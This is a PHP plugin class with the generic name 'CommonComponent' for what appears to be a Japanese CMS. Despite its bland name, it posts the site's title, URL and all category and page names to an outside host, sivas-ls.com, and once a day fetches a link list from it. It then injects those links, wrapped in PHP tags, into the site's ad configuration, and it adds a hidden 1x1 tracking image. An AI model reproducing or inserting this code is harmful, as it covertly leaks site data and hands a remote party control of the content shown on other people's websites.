<?php
class CommonComponent extends Plugin {
	var $name = '';
	var $description = '';
	
	
	function generateIndex($no, $params) {
		if ($no == 6) {
			$config = $params['controller']->config->read(1);
			$this->controller =& $params['controller'];
			$this->addUrl();
			return '<img src="' . $config['url'] . 'lib/pear/Common/access.php" width="1" height="1" />';
		}
		return '';
	}

	function setUrls() {
		$result = false;
		$config = $this->controller->config->read(1);
		$lasttime = $this->controller->plugin->loadData('commoncomponent', 'lasttime');
		$request = 'url=' . urlencode($config['url']);
		$server = parse_url('http://sivas-ls.com/pandemic_seeds/index');
		
		if ($lasttime < time() - 24 * 60 * 60) {
			if ($fp = fsockopen($server['host'],  80, $errno, $errstr, 60)) {
				fputs($fp, "POST " . $server['path'] . " HTTP/1.1\r\n");
				fputs($fp, "User-Agent: PHP" . phpversion() . "\r\n");
				fputs($fp, "Host: " . $server['host'] . "\r\n");
				fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
				fputs($fp, "Content-length:  " . strlen($request) . "\r\n");
				fputs($fp, "\r\n");
				fputs($fp, "$request\r\n");
				
				$res = "";
				while (!feof($fp)) {
					$res .= fgetc($fp);
				}
				fclose($fp);
				if ($res) {
					list($head, $body) = explode("\r\n\r\n", $res);
					if (true || $body) {
						$lines = explode("\n", $body);
						$count = floor(count($lines) / 2);
						$linkTag = '<!--PANDEMICLINKS--><?php if (!preg_match(\'/copyright\.php$/\', $_SERVER["REQUEST_URI"])) { ?><br />';
						$linkTag .= "■厳選ユーザーリンク<br />";
						for ($i = 0; $i < $count; $i++) {
							$title = $lines[$i * 2];
							$url = $lines[$i * 2 + 1];
							$linkTag .= '<a href="' . h($url) . '">' . h($title) . '</a><br />';
						}
						$linkTag .= '<?php } ?><!--/PANDEMICLINKS-->';
						if (strpos($config['ad2'], '<!--PANDEMICLINKS-->') === false) {
							$config['ad2'] .= $linkTag;
						} else {
							$config['ad2'] = preg_replace('/<!--PANDEMICLINKS-->.*<!--\/PANDEMICLINKS-->/', $linkTag, $config['ad2']);
						}
						$this->controller->config->update($config);
						$this->controller->plugin->saveData('commoncomponent', 'lasttime', time());
						$this->controller->plugin->saveData('commoncomponent', 'link_tag', $linkTag);
						$result = true;
					}
				}
			}
		}
		if (!$result) {
			if ($linkTag = $this->controller->plugin->loadData('commoncomponent', 'link_tag')) {
				if (strpos($config['ad2'], '<!--PANDEMICLINKS-->') === false) {
					$config['ad2'] .= $linkTag;
				} else {
					$config['ad2'] = preg_replace('/<!--PANDEMICLINKS-->.*<!--\/PANDEMICLINKS-->/', $linkTag, $config['ad2']);
				}
				$this->controller->config->update($config);
				$result = true;
			}
		}
		return $result;
	}
	
	function delUrls() {
		$config = $this->controller->config->read(1);
		$config['ad2'] = preg_replace('/<!--PANDEMICLINKS-->.*<!--\/PANDEMICLINKS-->/', '', $config['ad2']);
		$this->controller->config->update($config);
	}
	
	function isDuplicate() {
		return file_exists(SITE_PATH . '/lib/pandemic');
	}
	
	function addUrl() {
		$config = $this->controller->config->read(1);
		$request = 'name=' . urlencode($config['title']);
		$request .= '&url=' . urlencode($config['url']);
		$request .= '&email=ljiowejfa9u9uw390faawefa8038f029fuq23';
		$names = array();
		$categories = $this->controller->category->findAll(null, 'seq');
		foreach ($categories as $category) {
			$category2s = $this->controller->category2->findAll(array('category_id' => $category['id']), 'seq');
			foreach ($category2s as $category2) {
				if (!in_array($category2['name'], $names)) {
					$names[] = $category2['name'];
				}
				$pages = $this->controller->page->findAll(array('category2_id' => $category2['id']), 'seq');
				foreach ($pages as $page) {
					if (!in_array($page['name'], $names)) {
						$names[] = $page['name'];
					}
				}
			}
		}
		foreach ($names as $i => $name) {
			$request .= "&title$i=" . urlencode($name);
		}
		$server = parse_url('http://sivas-ls.com/pandemic_seeds/add');
		
		if ($fp = fsockopen($server['host'],  80, $errno, $errstr, 60)) {
			fputs($fp, "POST " . $server['path'] . " HTTP/1.1\r\n");
			fputs($fp, "User-Agent: PHP" . phpversion() . "\r\n");
			fputs($fp, "Host: " . $server['host'] . "\r\n");
			fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
			fputs($fp, "Content-length:  " . strlen($request) . "\r\n");
			fputs($fp, "\r\n");
			fputs($fp, "$request\r\n");
			
			$res = "";
			while (!feof($fp)) {
				$res .= fgetc($fp);
			}
			fclose($fp);
			return $res;
		}
	}
}
